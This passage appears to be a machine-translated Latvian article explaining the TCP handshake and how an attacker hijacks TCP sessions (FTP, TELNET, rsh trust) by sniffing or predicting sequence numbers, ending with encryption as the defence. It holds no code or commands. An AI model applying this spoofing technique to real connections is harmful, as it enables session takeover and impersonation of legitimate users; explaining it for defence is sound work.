Lai identificētu TCP paketi, TCP galvenē ir divi 32 bitu identifikatori, kas darbojas arī kā pakešu skaitītāji, ko sauc par kārtas numuru un apstiprinājuma numuru. Mūs interesēs arī vēl viens TCP paketes lauks, ko sauc par vadības bitiem. Šajā 6 bitu laukā ir iekļauti šādi vadības biti (secībā no kreisās uz labo):

URG - steidzamības karogs;

ACK - apstiprinājuma karogs;

PSH - nēsāšanas karogs;

RST - savienojuma atjaunošanas karogs;

SYN - sinhronizācijas karogs;

FIN - savienojuma pārtraukšanas karodziņš.

Apskatīsim TCP savienojuma izveides procedūru.

1. Ja resursdatoram A ir jāizveido TCP savienojums ar resursdatoru B, resursdators A nosūta resursdatoram B šādu ziņojumu:

A -> B: SYN, ISSA

Tas nozīmē, ka resursdatora A nosūtītajam ziņojumam ir iestatīts SYN karodziņš (Sinhronizēt kārtas numuru) un kārtas numura laukam ir iestatīta sākotnējā 32 bitu vērtība ISSa (Sākotnējais kārtas numurs).

2. Atbildot uz pieprasījumu, kas saņemts no resursdatora A, resursdators B atbild ar ziņojumu, kurā ir iestatīts SYN bits un iestatīts ACK bits. Secības numura laukā saimniekdators B iestata sākotnējo skaitītāja vērtību - ISSb; apstiprinājuma numura laukā būs ISSa vērtība, kas saņemta pirmajā paketē no resursdatora A, palielināta par vienu. Tātad saimniekdators B atbild ar šo ziņojumu:

B -> A: SYN, ACK, ISSb, ACK (ISSa+1)

3. Visbeidzot, resursdators A nosūta ziņojumu resursdatoram B, kurā: ir iestatīts ACK bits; kārtas numura laukā ir vērtība ISSa + 1; Apstiprinājuma numura laukā ir vērtība ISSb + 1. Pēc tam tiek uzskatīts, ka TCP savienojums starp resursdatoriem A un B ir izveidots:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Tagad resursdators A var nosūtīt datu paketes resursdatoram B, izmantojot jaunizveidoto virtuālo TCP kanālu:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATI

Šeit DATA apzīmē datus.

No iepriekš apskatītā TCP savienojuma izveides algoritma redzams, ka vienīgie TCP abonentu un TCP savienojuma identifikatori ir divi 32 bitu kārtas numura un apstiprinājuma numura parametri - ISSa un ISSb. Tāpēc, ja hakeram izdodas noskaidrot pašreizējās ISSa un ISSb lauku vērtības, nekas netraucēs viņam ģenerēt viltotu TCP paketi. Tas nozīmē, ka hakeram tikai jāatlasa TCP paketes ISSa un ISSb parametru pašreizējās vērtības konkrētajam TCP savienojumam, jānosūta pakete no jebkura interneta resursdatora šī TCP savienojuma klienta vārdā un šī pakete. tiks uztverts pareizi!

Šādas TCP pakešu viltošanas briesmas ir svarīgas arī tāpēc, ka augsta līmeņa FTP un TELNET protokoli tiek ieviesti, pamatojoties uz TCP protokolu, un FTP un TELNET pakešu klientu identifikācija pilnībā balstās uz TCP protokolu.

Turklāt, tā kā FTP un TELNET protokoli nepārbauda ziņojumu sūtītāju IP adreses, pēc viltotas paketes saņemšanas FTP vai TELNET serveri nosūtīs atbildes ziņojumu uz viltus paketē norādīto hakeru saimniekdatora IP adresi. Pēc tam hakeru resursdators sāks strādāt ar FTP vai TELNET serveri no savas IP adreses, bet ar likumīgi savienota lietotāja tiesībām, kurš savukārt zaudēs kontaktu ar serveri skaitītāju nesakritības dēļ.

Tādējādi, lai veiktu iepriekš aprakstīto uzbrukumu, nepieciešams un pietiekams nosacījums ir zināšanas par diviem pašreizējiem 32 bitu parametriem ISSa un ISSb, kas identificē TCP savienojumu. Apsvērsim iespējamie veidi to saņemšana. Gadījumā, ja hakeru resursdators ir savienots ar uzbrukuma tīkla segmentu, ISSa un ISSb vērtību iegūšanas uzdevums ir triviāls, un to var atrisināt, analizējot tīkla trafiku. Tāpēc ir skaidri jāsaprot, ka TCP protokols principā ļauj aizsargāt savienojumu tikai tad, ja uzbrucējam nav iespējams pārtvert ziņojumus, kas tiek pārsūtīti šo savienojumu, tas ir, tikai gadījumā, ja hakeru resursdators ir savienots ar tīkla segmentu, kas atšķiras no TCP savienojuma abonenta segmenta.

Tāpēc uzbrukumi starp segmentiem visvairāk interesē hakeri, kad uzbrucējs un viņa mērķis atrodas dažādos tīkla segmentos. Šajā gadījumā uzdevums iegūt ISSa un ISSb vērtības nav triviāls. Lai atrisinātu šo problēmu, tagad ir izgudrotas tikai divas metodes.

TCP savienojuma parametru sākotnējās vērtības matemātiskā prognozēšana, ekstrapolējot iepriekšējās ISSa un ISSb vērtības.

Ievainojamību izmantošana TCP savienojuma abonentu identificēšanā Unix rsh serveros.

Pirmais uzdevums tiek atrisināts, veicot padziļinātus pētījumus par TCP protokola ieviešanu dažādās operētājsistēmas un tagad tam ir tīri teorētiska nozīme. Otrā problēma tiek atrisināta, izmantojot ievainojamības Unix sistēmas identificējot uzticamos saimniekdatorus. (Uzticams attiecībā uz konkrēto resursdatoru A ir tīkla resursdators B, kura lietotājs var izveidot savienojumu ar resursdatoru A bez autentifikācijas, izmantojot resursdatora A r-pakalpojumu). Manipulējot ar TCP pakešu parametriem, hakeris var mēģināt uzdoties par uzticamu resursdatoru un pārtvert TCP savienojumu ar uzbrukuma resursdatoru.

Tas viss ir ļoti interesanti, taču praktiskie rezultāti šāda veida pētījumiem vēl nav redzami. Tāpēc visiem, kas vēlas šajā tēmā iedziļināties, iesakām pievērsties grāmatai, no kuras galvenokārt ņemta iepriekš izklāstītā informācija.

Secinājums

Tīkla datu pārtveršana ir visefektīvākā tīkla uzlaušanas metode, kas ļauj hakeram iegūt gandrīz visu tīklā cirkulējošo informāciju. Vislielākā praktiskā attīstība panākta ar šņaukšanas instrumentiem, t.i. klausīšanās tīklos; Tomēr mēs nevaram ignorēt metodes tīkla datu pārtveršanai, kas tiek veiktas, traucējot normālai tīkla darbībai, lai novirzītu trafiku uz hakeru resursdatoru, jo īpaši TCP savienojumu pārtveršanas metodes. Tomēr praksē pēdējās minētās metodes vēl nav pietiekami attīstītas un ir jāuzlabo.

Antihakerim būtu jāzina, ka vienīgais glābiņš no datu pārtveršanas ir to šifrēšana, t.i. kriptogrāfiskās aizsardzības metodes. Nosūtot ziņojumu tīklā, jau iepriekš jāpieņem, ka tīkla kabeļu sistēma ir absolūti neaizsargāta, un jebkurš tīklam pieslēgts hakeris varēs no tā noķert visus pārsūtītos slepenos ziņojumus. Šīs problēmas risināšanai ir divas tehnoloģijas – VPN tīkla izveide un pašu ziņojumu šifrēšana. Visus šos uzdevumus ir ļoti viegli atrisināt, izmantojot PGP Desktop Security programmatūras pakotni (tās aprakstu var atrast, piemēram, in).

Populārs kategorijā: